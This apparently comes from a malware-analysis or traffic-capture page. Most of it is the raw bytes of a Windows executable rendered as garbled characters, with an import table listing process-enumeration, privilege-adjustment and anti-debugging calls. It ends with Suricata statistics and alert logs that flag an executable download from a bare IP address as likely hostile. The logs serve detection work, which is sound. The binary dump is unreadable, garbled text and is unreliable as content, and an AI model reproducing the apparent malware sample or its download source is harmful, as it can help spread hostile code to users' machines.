€ƒÄ…Àus‹ó賌ÿÿÙîƒcÝ[ ƒcj¿°úFuÑY3ÀÆC)fÇC*ó¦u	ÇCë8j¿ úFuÑY3Àó¦u‹óèjŒÿÿ3À@‰C‰Cƒeüëj¿àúFuÑY3Àó¦u!Eü‹Eü_^ÉÃVW‹ð蠎ÿÿV‹øè[‘ÿÿY‹Ç_^Ãè6…Àt3ÀÃ=4–GVWu3ÿëjÿp–GY‹øWèsÿÿ¡0ÆGY‹ð…Àt>ƒ|$t7‹F‹L$Š:u„ÒtŠQ:PuƒÁƒÀ„Òuä3ÀëÀƒØÿ…Àt‹v…öuÂWèAÿÿY_‹Æ^Ãèƒ5…ÀuVV94–Gu3öëjÿp–GY‹ðVèöŽÿÿ‹T$YèPŽÿÿƒ|$¡0ÆGu…Àt‹H‰J‰Pë	‰B‰0ÆGVèàŽÿÿY3À^ÃV3ö954–Gtjÿp–GY‹ðV衎ÿÿ‹T$èüÿÿV谎ÿÿYY3À^Ãÿt$ÿ¤Fé3ÿÿVWÿt$ÿX–GY‹L$‹ðjXè‡ÿÿƒ=8ÇGt!¡èÅGƙ;4ÇG|;0ÇGrVè`ÿÿYVÿH–G‹øY…ÿu98ÇGt(VèCÿÿVÿH–G‹øYY…ÿtWÿT–G‹ðY‹Ö3É聆ÿÿ‹D$‰8_‹Æ^ÃU‹ìV‹uFÿ=þþÿw;ƒ=0–Gt%ÿ5(ÇGèʍÿÿEPVèCÿÿÿÿ5(ÇGèӍÿÿƒÄëVÿH–GY‰Eëƒe‹E^]ÃU‹ìQ9=̖G|!ÿ5(ÇG肍ÿÿ¡ ÇGY…Àudÿ5(ÇG苍ÿÿYƒ=0–Gt?ÿ5(ÇGèXÿÿj‹ÏXèñ…ÿÿEüPWèÇþÿÿƒÄƒ}üt
j‹ÐY踅ÿÿÿ5(ÇGèDÿÿë
WÿH–G‰EüY‹EüÉË
@ÇGVH£ ÇG‹4¯5̖G3ÒjBYèy…ÿÿj‹ÏX苅ÿÿÿ5(ÇGèûŒÿÿ¡È–GYÆ^ÉÃV‹ð…ö„ª‹
ȖG…ÉtO;ñrK;5@ÇGsC+Á™÷=̖Gÿ5(ÇG‹ð蛌ÿÿ¡ ÇG‹
@ÇG‰4ÿ ÇGjƒÊÿYè…ÿÿÿ5(ÇG菌ÿÿYëPƒ=0–Gt@WVÿT–Gÿ5(ÇG‹øèPŒÿÿ‹×j÷ÚYè˄ÿÿ3ÉèĄÿÿVÿL–Gÿ5(ÇGèIŒÿÿƒÄ_^ÃVÿL–GY^ÃU‹ìQƒ}u	SèþÿÿYÉÅÛ
ÿu貍ÿÿY3ÀÉÁûÿÿ}ôVWÿuÿT–G‹ðS‰uüÿX–G‹øYY;÷u‹u鬃=0–G„‘ÿ5(ÇG谋ÿÿYj‹ËXèH„ÿÿ¡è\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P	ŠÅG+ÆǙ;4ÇG|;0ÇGr‹Ç+ÆP覌ÿÿYWÿuÿP–G‹ðYY…öu!98ÇGt-S腌ÿÿWÿuÿP–G‹ðƒÄ…ötVÿT–G‹Ð+UüY3É较ÿÿÿ5(ÇGèJ‹ÿÿë
WÿuÿP–GY‹ðY_‹Æ^ÉÃè|1…Àt3ÀÃSÿt$‹\$èáþÿÿY[ÃVÿt$èýÿÿ‹ðY…ötÿt$jVè߃Ä‹Æ^ÅötL€~t3ÀÀ¾ât:·†à9D$-‹†ì…Àt#‹ÿ†ä‹Žä‰–ì;Žè~‰ŽèÃÿt$èüÿÿY…Àu…ötÆFÃVW‹ð3ÿ€~ud…Ûu	RèƒÿÿÿYëY‹Ã‹Îèȋÿÿ…Àt7·†à;ЋÃë=Rè^ÿÿÿ‹øY…ÿt.·†àPSWèÀøSVèŒÿÿƒÄëRSèôþÿÿ‹øYY…ÿuÆF‹Ç_^ÃS‹Ø‹D$Vè~ÿÿÿ‹ð…öuSÿt$èâ‹ÿÿYY‹Æ^[Ã|$u3ÀËL$VWèõŒÿÿxW‹òèàþÿÿ‹ðY…ötWÿt$VèFøƒÄ_‹Æ^Ã|$u3ÀÃVGP‹ñè°þÿÿ‹ðY…ötWÿt$VèøƒÄÆ>‹Æ^ÃU‹ìQS‹ØŠG
GuP…Ûy‹M肌ÿÿ‹Ø…Ût>ƒ}t8‹O‹GV;Ð|€u'+ÁXÿÆG…Û~‹GGSÿuPè³÷ƒÄ_^[ÉÍC™‹È‹G‹ò™ȋGò™;ò|;Èv
‹÷èH‹ÿÿÆGëы7Q‰OèûýÿÿY‰Eü…ÀtÿwÿwPè_÷ƒÄ‹÷è‹ÿÿ‹Eü‰G늋÷ÆGè‹ÿÿ듋G…ÀtB‹OÆ€t5‹G;Gu-‹GV‹7@PèŸýÿÿY‰G^…Àt‹OAQÿwPè÷ƒÄëÆG‹GÃÌU‹ììS3Û8xÃGunVSf‰yÃGèŽøÿÿÿÿÿQ¾VPÿP8ƒÄ3Àˆ€{ÃG@;Æ|õ3ÀŠŒÿÿÿˆ{ÃG
zÃG¶
zÃGŠ˜{ÃG‰{ÃGŠˆˆ{ÃG@;Æ|ËÆxÃG^þyÃG¶yÃG€{ÃGŠ
zÃG¶zÃGŠ’{ÃGˆ¶zÃGˆˆ{ÃG¶yÃGŠ€{ÃGÁ¶ÀŠ€{ÃG[ÉÃ=4–GV‹t$Wu3ÿëjÿp–GY‹øWèW‡ÿÿYëÿL$èüþÿÿˆFƒ|$uíWèY‡ÿÿY_^ÃU‹ì‹E™+ÂVÑø@WP‹ñèLüÿÿÿM‹ø3öY;þtR9u~BS‹ED0¾¾Pÿ‹ÁÁø$³öë*ȋÂÁø$4\dz OÖÔ¼¦JÚÀ¨d¯PÀ(\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(PÔýFëkÉdjdXéhW<;ú_~+ы…À3À^ËiÀèPQÿQ<YY3À@^ÃV‹t$ÿvDè™ÿÿ‹D$ÿvDƒ¦ ‰†˜‹D$‰†œèz™ÿÿYY3À^ÃV‹t$ÿvDèI™ÿÿ‹D$Y3É;Á~‹L$‰†‹D$‰†ë‰Ž‰ŽÿvD‰Žè,™ÿÿY^ËL$…É~‹D$Ph¨}@‰ˆ¤Pëjjÿt$èWÿÿÿƒÄ3ÀËD$ǀØÃV‹t$WÿvDèÀ˜ÿÿ‹L$‹¾˜ÿvD‰Ž”‹L$‰Ž˜è¼˜ÿÿYY‹Ç_^ÃV‹t$WÿvD艘ÿÿ‹L$‹¾ ÿvD‰Žœ‹L$‰Ž è…˜ÿÿYY‹Ç_^ÃV‹t$WÿvDèR˜ÿÿ‹L$‹¾¤ÿvD‰Ž¨‹L$‰Ž¤èN˜ÿÿYY‹Ç_^ÃV‹t$WÿvDè˜ÿÿ‹L$‹¾´ÿvD‰Ž¸‹L$‰Ž´è˜ÿÿYY‹Ç_^ÃV‹t$WÿvDèä—ÿÿ‹L$‹¾¬ÿvD‰Ž°‹L$‰Ž¬èà—ÿÿYY‹Ç_^ËT$ƒú
w$‹D$V‹t$LH‹…öx‹•ÄïF;ò~‹ò‰1^ÃÈÿÃV‹t$ÿvDè}—ÿÿ‹D$ÿvDƒ¦À‰†¼‹D$‰†Äèx—ÿÿYY3À^ÃV‹t$ÿvDèG—ÿÿ‹D$ÿvDƒ¦¼‰†À‹D$‰†ÄèB—ÿÿYY3À^ËD$¶@ÃÃV‹t$ÿvDè—ÿÿ‹D$ÿvD÷ØÀ%ÿÿÿÿ‰Fè—ÿÿYY3À^ÃU‹ìQS‹]WÿsDÇEüè̖ÿÿY3É9MtA;K}x‹{V‹u‹Š:u„ÒtŠP:VuƒÀƒÆ„Òuä3ÀëÀƒØÿ…Àt	AƒÇ;K|É^;K}7‹Cɋ|È…ÿt*è-Âÿÿ‹G‹‹@8‹…ÉtÿuÿuPÿQ(ƒÄ‰Eü‹ÇèlÂÿÿÿsDè]–ÿÿ‹EüY_[ÉÃSU‹l$VWjhPúFUèšÿÿƒÄ…ÀuƒÅ‹ÍèF™ÿÿ‹ø»ôÇF‹3WVUèå™ÿÿƒÄ…ÀuŠ>„Àt<=tƒÃûüÇF|Ù3À_^][Ã3À@ëöU‹ìQQ‹@‹MøQPÿP@ÝEøÜ
°øFYYܘ*Fèxƒ‰‰VÆF*ÉÃU‹ìQQ‹Ç‹Ëèj‘ÿÿ…Àu3ÀÉËNjËècÿÿ…ÀtïVºXúF‹Ëè™ÿÿ…Àu‹E‹÷èÿÿÿë:juü‹Ã菙ÿÿY…Àt-EøP‹Ãè0šÿÿÝEøÜ
°øFYܘ*Fèü‚‰‰WÆG*3Àë3À@^ÉÃU‹ìƒìhV‹ðWEÈ3ÿÇE\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P)³ü+Ɗ„Ét¶ÉŠ‰`ÅFGˆ0Fƒÿ|çÆD=ȾEȃøl÷„ºƒø+tƒø-tƒÀЃø	‡EðPEÈ蝙ÿÿYLȀ9:…ž¶EÈö€`ÆFuÈuuÉj0E˜jPèŠ#ƒÄE˜‹ÎèXŽÿÿ…À…µu˜èKÿÿ‹}˜jÿÇÒlýƒUœÿh¤ÙúÿuœW萂jh\&RPèbMøUœ€}È-u
‹Eœ÷߃Ð÷؉Eœ‹óèÿÿ;‹EœfÇC(CÆC+é2¶ö€`ÆF‰MøtA¶ö€`ÆFuó‰Møè—ÿÿ‹øGýƒø‡Dÿ€8suÆO‹ó褎ÿÿÙîÝEðƒeüØÑßàÝÙöÄzÝè*Fëݘ*FÝ]èƒÿu#‹uøj¿àúFY3Àó¦„AÝØÇEüéJƒÿu ‹uøj¿ØúFY3Àó¦…ÆÜ
ÐúFéjY;ùu8‹uøj¿ÈúFY3Àó¦uÜ
ÀúFéñ‹uøj¿¸úFY3Àó¦u™Ü
èøFéÕÝ؃ÿu‰‹uø¿°úF3Àó¦…wÿÿÿ‹óè|ÿÿ‹ÃèkÿÿÝEðèv€‹ø{‹Kj^Aÿ…ɍAô™÷þ‹óÆC*CkÀ+ȉK薍ÿÿ‰}øÛEøÙÀÝEðÚéßàöÄD{sÜmðÜ
¨úFëS‹uøj¿ úFY3Àó¦…ýþÿÿ耋ø‹ó‰}øèúŽÿÿ‹Ãèéÿÿ{ÆC*è>ÿÿÛEøÙÀÝEðÚéßàöÄD{ÜmðÜ
˜úFÜ
°øFÜEèèþSëÝØfÇC(ÆC+é`j
¿ŒúFuÈY3Àó¦…K‹óèâŒÿÿ‹ÃèýÿÿSfÇC(ÆC+éƒès„–HH„ôHH…jEÈh€úFP萁ƒÄ…À…õEðPEÐ莖ÿÿY…ÀŽàÝEðè(‰EøÛEøÝEðÚéßàöÄDŠÂƒ}øŒ¸ÝxúFÜ]ðßàöÄA…¤‹óèäÿÿ‹ÃèӎÿÿfÇC*è)Œÿÿ‹;‹Cj‹ÏÁŠ¹¾\&VƒÐPQèljjRP耉Eð‹Eø‰Uô™9Uô|9EðvƒEðùƒUôÿ+EðjUôVRPèJÇS‰‰Séìþÿÿj
¿lúFuÈY3Àó¦uA8C*t<‹‹Kj^VÀ¨h€QÎQPèò~"S>ÒÈ¿‰‰Sf‰s(ÆC+‰uüéÒj¿húFuÈY3Àó¦…½‹óèT‹ÿÿ‹ÃèoŽÿÿ‹ð)3‹ú‹Ã{fÇC(ÆC\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P+èUŽÿÿ+ðú3{ëpj	EÈh\úFPè
€ƒÄ…Àus‹ó賌ÿÿÙîƒcÝ[ ƒcj¿°úFuÑY3ÀÆC)fÇC*ó¦u	ÇCë8j¿ úFuÑY3Àó¦u‹óèjŒÿÿ3À@‰C‰Cƒeüëj¿àúFuÑY3Àó¦u!Eü‹Eü_^ÉÃVW‹ð蠎ÿÿV‹øè[‘ÿÿY‹Ç_^Ãè6…Àt3ÀÃ=4–GVWu3ÿëjÿp–GY‹øWèsÿÿ¡0ÆGY‹ð…Àt>ƒ|$t7‹F‹L$Š:u„ÒtŠQ:PuƒÁƒÀ„Òuä3ÀëÀƒØÿ…Àt‹v…öuÂWèAÿÿY_‹Æ^Ãèƒ5…ÀuVV94–Gu3öëjÿp–GY‹ðVèöŽÿÿ‹T$YèPŽÿÿƒ|$¡0ÆGu…Àt‹H‰J‰Pë	‰B‰0ÆGVèàŽÿÿY3À^ÃV3ö954–Gtjÿp–GY‹ðV衎ÿÿ‹T$èüÿÿV谎ÿÿYY3À^Ãÿt$ÿ¤Fé3ÿÿVWÿt$ÿX–GY‹L$‹ðjXè‡ÿÿƒ=8ÇGt!¡èÅGƙ;4ÇG|;0ÇGrVè`ÿÿYVÿH–G‹øY…ÿu98ÇGt(VèCÿÿVÿH–G‹øYY…ÿtWÿT–G‹ðY‹Ö3É聆ÿÿ‹D$‰8_‹Æ^ÃU‹ìV‹uFÿ=þþÿw;ƒ=0–Gt%ÿ5(ÇGèʍÿÿEPVèCÿÿÿÿ5(ÇGèӍÿÿƒÄëVÿH–GY‰Eëƒe‹E^]ÃU‹ìQ9=̖G|!ÿ5(ÇG肍ÿÿ¡ ÇGY…Àudÿ5(ÇG苍ÿÿYƒ=0–Gt?ÿ5(ÇGèXÿÿj‹ÏXèñ…ÿÿEüPWèÇþÿÿƒÄƒ}üt
j‹ÐY踅ÿÿÿ5(ÇGèDÿÿë
WÿH–G‰EüY‹EüÉË
@ÇGVH£ ÇG‹4¯5̖G3ÒjBYèy…ÿÿj‹ÏX苅ÿÿÿ5(ÇGèûŒÿÿ¡È–GYÆ^ÉÃV‹ð…ö„ª‹
ȖG…ÉtO;ñrK;5@ÇGsC+Á™÷=̖Gÿ5(ÇG‹ð蛌ÿÿ¡ ÇG‹
@ÇG‰4ÿ ÇGjƒÊÿYè…ÿÿÿ5(ÇG菌ÿÿYëPƒ=0–Gt@WVÿT–Gÿ5(ÇG‹øèPŒÿÿ‹×j÷ÚYè˄ÿÿ3ÉèĄÿÿVÿL–Gÿ5(ÇGèIŒÿÿƒÄ_^ÃVÿL–GY^ÃU‹ìQƒ}u	SèþÿÿYÉÅÛ
ÿu貍ÿÿY3ÀÉÁûÿÿ}ôVWÿuÿT–G‹ðS‰uüÿX–G‹øYY;÷u‹u鬃=0–G„‘ÿ5(ÇG谋ÿÿYj‹ËXèH„ÿÿ¡è\dz \dz OìEÞ‰B¼¦JÚÀ¨d¯PÀ(P	ŠÅG+ÆǙ;4ÇG|;0ÇGr‹Ç+ÆP覌ÿÿYWÿuÿP–G‹ðYY…öu!98ÇGt-S腌ÿÿWÿuÿP–G‹ðƒÄ…ötVÿT–G‹Ð+UüY3É较ÿÿÿ5(ÇGèJ‹ÿÿë
WÿuÿP–GY‹ðY_‹Æ^ÉÃè|1…Àt3ÀÃSÿt$‹\$èáþÿÿY[ÃVÿt$èýÿÿ‹ðY…ötÿt$jVè߃Ä‹Æ^ÅötL€~t3ÀÀ¾ât:·†à9D$-‹†ì…Àt#‹ÿ†ä‹Žä‰–ì;Žè~‰ŽèÃÿt$èüÿÿY…Àu…ötÆFÃVW‹ð3ÿ€~ud…Ûu	RèƒÿÿÿYëY‹Ã‹Îèȋÿÿ…Àt7·†à;ЋÃë=Rè^ÿÿÿ‹øY…ÿt.·†àPSWèÀøSVèŒÿÿƒÄëRSèôþÿÿ‹øYY…ÿuÆF‹Ç_^ÃS‹Ø‹D$Vè~ÿÿÿ‹ð…öuSÿt$èâ‹ÿÿYY‹Æ^[Ã|$u3ÀËL$VWèõŒÿÿxW‹òèàþÿÿ‹ðY…ötWÿt$VèFøƒÄ_‹Æ^Ã|$u3ÀÃVGP‹ñè°þÿÿ‹ðY…ötWÿt$VèøƒÄÆ>‹Æ^ÃU‹ìQS‹ØŠG
GuP…Ûy‹M肌ÿÿ‹Ø…Ût>ƒ}t8‹O‹GV;Ð|€u'+ÁXÿÆG…Û~‹GGSÿuPè³÷ƒÄ_^[ÉÍC™‹È‹G‹ò™ȋGò™;ò|;Èv
‹÷èH‹ÿÿÆGëы7Q‰OèûýÿÿY‰Eü…ÀtÿwÿwPè_÷ƒÄ‹÷è‹ÿÿ‹Eü‰G늋÷ÆGè‹ÿÿ듋G…ÀtB‹OÆ€t5‹G;Gu-‹GV‹7@PèŸýÿÿY‰G^…Àt‹OAQÿwPè÷ƒÄëÆG‹GÃÌU‹ììS3Û8xÃGunVSf‰yÃGèŽøÿÿÿÿÿQ¾VPÿP8ƒÄ3Àˆ€{ÃG@;Æ|õ3ÀŠŒÿÿÿˆ{ÃG
zÃG¶
zÃGŠ˜{ÃG‰{ÃGŠˆˆ{ÃG@;Æ|ËÆxÃG^þyÃG¶yÃG€{ÃGŠ
zÃG¶zÃGŠ’{ÃGˆ¶zÃGˆˆ{ÃG¶yÃGŠ€{ÃGÁ¶ÀŠ€{ÃG[ÉÃ=4–GV‹t$Wu3ÿëjÿp–GY‹øWèW‡ÿÿYëÿL$èüþÿÿˆFƒ|$uíWèY‡ÿÿY_^ÃU‹ì‹E™+ÂVÑø@WP‹ñèLüÿÿÿM‹ø3öY;þtR9u~BS‹ED0¾¾Pÿ‹ÁÁø$³öë*ȋÂÁø$4\dz"–£Â¼¦JÚÀ¨d¯PÀ(\dz"\dz"–£ìEÞ‰B¼¦JÚÀ¨d¯PÀ(PÉbó+W=Ðp‘5_¼<©<Q/+zý]¼r™5…r)_»Ð©<k.+zñï¼ÄÅr™…+W=Ðp‘?o_¬$zø]¬$>‘ÔùÔùY¼©_´<¨<•/+zñ]¼4r%U;ÔéÔù†“Ôá+]¼0r‘%„r™…r†•
+_¼©_´r…ñ†õ+W=Ü©_¼©_´0¨<ù;+r†r‘„G+W=Üp‘!_´(ú™]´r5†r‘)_±Ä¨<-+zñ„r!†r‘-„7+_´¨_¬r–é„+W=Üú‘]¼8r™!…+_¬0«<1%++_¼Àr™]ñ_¼(r1¤55¬_Wø“”‘ÔÉÔù¼ùÄùԓÔ#+]¼>‘ÔùÔùY¼,©_´Ü¨<‰.+zñ]¼0rñ†+W=Ðp‘_¼Ü©<».+zý]¼r™U8ÔéÔù]´$r	†“ÔÁ+]¼(>‘%ÔùÔùY¼©_´8¨_¬r–ý„Ó+W=Ü©_´Ä¨_¬Ø«</)+zé]¼4r‘%„r™…r-†;+_¼,©_´0¨_¬(«<'%+r‘-]¼ r™…r!_»Ü©<A,+zñ„r™…r†
_¼(©_´Ü¨<Õ(+zñ]¼<z©ԍÝr†s	+W„ù é¼ùTùԓÔr‘-„	+_´8¨_¬r–鄵+W=Ür™í]ø_¼<r1¤5¬_Wü>‘
ÔùÔù¼8øÔùÔr‘ñ]¼$r™ñ×´Øp™_¬À«¾ù<ë$+p‘
¼4ùÔùÔr‘„r™…rñ†r‘é„×+W=Äp‘%W„ù °_´8zø]´8t†r‘„r™ñ…r%†+W=Äp‘_¼ ú‘]¼r™…r†r‘!„	+_´4ú™]´4Brá_¼4pÖr‘
_‰:5555555uÉÔùÔ:5555¬_Wìp‘
<9+	+]¼8r‘_±Üp™-_¬r–Å_´r€ø„p!<ùÔùÔ¡]¼,>‘)ÔùÔùY¼©¼þùԓÑr™!…r-†
+W=Àp‘5_¼,üTâÔù]¼(z©)ԍÜr™)]´Ó>‘1,ÓÔù_¬«_¼©_´(¨<û$+z©ԌÑó+_¬(>–øÔùÔù_¼ p‘	_´$rÅp_¼$rœý]´r	_»Üp‘_´$r…õ]¬<¡+Œ4¡%+Œ0r‘+)_‰:ÔùÔLeÀi@tgÆkh,eNl eœl$gªlHgÎl<$eúlg\dz"\dz"–£ìEÞ‰B¼¦JÚÀ¨d¯PÀ(P¼Âm`g&mTøgHmìPgšmDðg´mäeâmhg"n\„lllXlÀmØl&llükêkÜkÒk6lôh
ii(i<iXiji|iŽiži°iŒtxtdtPt>t,t tttòsâsÔsàh°sšsŽs€srsbsrh@s"ssRhÞrÎr¾r®r˜r†rxr^rJr>r,rrrÒh´hœh¾s†hFh6h hhúqîqäqÒq¸qžq„qjq^qHq:qPs(qbhqþpòpàpÊp¼p¦pp€p tìrhnp^pLp.nDn\ntnŒnœn¬nÂnÔnænònþnoo(oDoborošo¢o¶oÂoÐoÞoèoúo
pp0pêl€€€£€§€¥€€€¸lPmˆmpmmnìmÎiôiÚiºk¨k–k„kvkfkVkFk4k$kkkðjÞjÌjºj¦j˜jŒjvjhj\jLj:j(jjj¦m2m›VirtualAllocPGetLastError«WaitForSingleObjectÀGetStdHandle
lstrlenA³CreateEventA¥LoadLibraryAdGetModuleHandleAùOutputDebugStringA@EnumSystemCodePagesWôGetConsoleScreenBufferInfoîOpenProcess	GetCurrentProcess
GetCurrentProcessIdCloseHandleâGetTempPathA\dz"\dz"–£ìEÞ‰B¼¦JÚÀ¨d¯PÀ(PÉgàGetTempFileNameAñCreateToolhelp32Snapshot
Process32FirstWProcess32NextWÅModule32FirstWÇModule32NextW¤VirtualQueryExÐGetSystemInfoKERNEL32.dllzwsprintfAActivateKeyboardLayout·SendMessageA DefWindowProcAqPostQuitMessageCallWindowProcApCreateWindowExASetWindowPosçEndDialog<GetDlgItem8GetDialogBaseUnitsÔSetFocusSGetKeyStateªGetSystemMetrics¿SetActiveWindowSetWindowTextAÏGetWindowTextAËGetWindowRectAdjustWindowRect3GetCursorPosîIntersectRectÄGetWindowLongA±GetTopWindow2GetCursorInfo¼SendMessageW ShowWindowSetWindowTextWÒGetWindowTextWÅGetWindowLongW#LoadIconWUSER32.dllBitBlt=CreateFontAZExcludeClipRect9GetStockObjectIGetTextExtentPoint32AÕSelectObjectSetTextJustificationGDI32.dllOpenProcessTokenAdjustTokenPrivileges­LookupPrivilegeValueWADVAPI32.dllOLEAUT32.dllGetMappedFileNameWPSAPI.DLL9AVIStreamWrite*MCIWndCreateAAVIFIL32.dllMSVFW32.dllGPathFileExistsASHLWAPI.dllPdhCollectQueryDatapdh.dllŸRpcMgmtInqDefaultProtectLevelžRpcMgmtInqComTimeout RpcMgmtInqIfIdsRPCRT4.dll/GetThemeIntUxTheme.dllAuthzInitializeResourceManag\dz"\dz"–£ìEÞ‰B¼¦JÚÀ¨d¯PÀ(PQÔerAUTHZ.dllþphoneNegotiateExtVersion	phoneSetStatusMessagesTAPI32.dllÍWideCharToMultiByte%EnterCriticalSection¢LeaveCriticalSectionDeleteCriticalSection!EncodePointerþDecodePointerÑMultiByteToWideCharÅGetStringTypeW@RaiseException­RtlUnwind3HeapFreeÉGetCommandLineW³GetCPInfo/HeapAlloc‚UnhandledExceptionFilterCSetUnhandledExceptionFilterSetLastErrorHInitializeCriticalSectionAndSpinCountRSleepaTerminateProcesssTlsAllocuTlsGetValuevTlsSetValuetTlsFree¾GetStartupInfoWòGetTickCountgGetModuleHandleWGetProcAddressmIsProcessorFeaturePresent“CompareStringW–LCMapStringWTGetLocaleInfoWtIsValidLocaleüGetUserDefaultLCIDGEnumSystemLocalesWQExitProcessfGetModuleHandleExWAreFileApisANSI8HeapSizeGetCurrentThreadIdgIsDebuggerPresent¢GetProcessHeap>GetFileTypecGetModuleFileNameWáWriteFile

This file has been truncated. Go here to download in full.


stats.log - (2762 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
------------------------------------------------------------------------------------
Date: 5/1/2019 -- 14:35:42 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1026
decoder.bytes                              | Total                     | 766122
decoder.ipv4                               | Total                     | 986
decoder.ipv6                               | Total                     | 8
decoder.ethernet                           | Total                     | 1026
decoder.tcp                                | Total                     | 945
decoder.udp                                | Total                     | 49
decoder.avg_pkt_size                       | Total                     | 746
decoder.max_pkt_size                       | Total                     | 1260
flow.tcp                                   | Total                     | 2
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 2
tcp.syn                                    | Total                     | 2
tcp.synack                                 | Total                     | 2
tcp.rst                                    | Total                     | 2
tcp.overlap                                | Total                     | 1
detect.alert                               | Total                     | 5
detect.mpm_list                            | Total                     | 6
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 7
app_layer.flow.http                        | Total                     | 2
app_layer.tx.http                          | Total                     | 2
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 1
app_layer.flow.failed_udp                  | Total                     | 10
flow.spare                                 | Total                     | 10000
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65536
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7076608


eve.json - (6281 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
{"timestamp":"2019-04-30T02:29:52.179783+0000","flow_id":509764083655729,"pcap_cnt":27,"event_type":"alert","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-04-30T02:29:52.179783+0000","flow_id":509764083655729,"pcap_cnt":27,"event_type":"alert","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019714,"rev":10,"signature":"ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-04-30T02:29:52.196943+0000","flow_id":509764083655729,"pcap_cnt":65,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-04-30T02:29:52.196943+0000","flow_id":509764083655729,"pcap_cnt":65,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-04-30T02:29:52.661527+0000","flow_id":34019146209303,"pcap_cnt":205,"event_type":"dns","src_ip":"192.168.100.175","src_port":56555,"dest_ip":"192.168.100.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21780,"rrname":"www.bing.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"www.bing.com","rrtype":"CNAME","ttl":26,"rdata":"a-0001.a-afdentry.net.trafficmanager.net"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"a-0001.a-afdentry.net.trafficmanager.net","rrtype":"CNAME","ttl":59,"rdata":"dual-a-0001.a-msedge.net"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"dual-a-0001.a-msedge.net","rrtype":"A","ttl":23,"rdata":"204.79.197.200"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"dual-a-0001.a-msedge.net","rrtype":"A","ttl":23,"rdata":"13.107.21.200"}}
{"timestamp":"2019-04-30T02:29:52.958346+0000","flow_id":844479475001531,"pcap_cnt":317,"event_type":"http","src_ip":"192.168.100.175","src_port":49202,"dest_ip":"204.79.197.200","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.bing.com","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"image\/x-icon"}}
{"timestamp":"2019-04-30T02:29:54.956067+0000","flow_id":509764083655729,"pcap_cnt":675,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2015744,"rev":4,"signature":"ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)","category":"Misc activity","severity":3},"app_proto":"http"}
